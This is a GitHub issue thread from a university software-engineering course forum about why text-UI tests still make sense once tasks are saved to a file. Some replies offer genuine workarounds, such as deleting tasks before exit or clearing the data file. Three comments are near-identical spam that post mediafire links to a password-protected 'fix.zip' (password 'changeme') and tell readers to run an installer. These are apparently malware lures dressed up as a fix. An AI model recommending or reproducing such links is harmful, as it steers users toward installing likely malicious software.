### ISSUE TITLE
Purpose of text-Ui-Testing 

### ISSUE THREAD

**Issue by OrangeCatLoves** [nus-cs2103-AY2425S1/forum#93]
With regards to the text-Ui-testing, since we're required to do level-7 which is to save the tasks into a script, then what's the use of running the runtest.bat and checking if ACTUAL.TXT == EXPECTED.TXT.  Since, EXPECTED.TXT will always change as we add more tasks to the list and the script .txt file will always get updated with more new tasks, then we will always have to manually change the EXPECTED.TXT each time, because the output system.out will always change.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by damithc** [comment]
Good point @OrangeCatLoves 
Anyone has any ideas on how to get around this complication?

**Comment by Feng1231** [comment]
delete all your tasks before exiting with 'bye' command.
For eg.

```
todo t1
todo t2
todo t3
Delete 3
Delete 2
Delete 1
bye
```


For input testing, theres only so much that we can do. You can explore other ways to go around this issue when you actually code test methods.

Or perhaps you can edit your batch script to check if text.txt exist and delete the text.txt file if it does before running ur programme!

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zi-yii** [comment]
Maybe you can include a method clearTasks() to delete all the tasks when user input is 'bye'
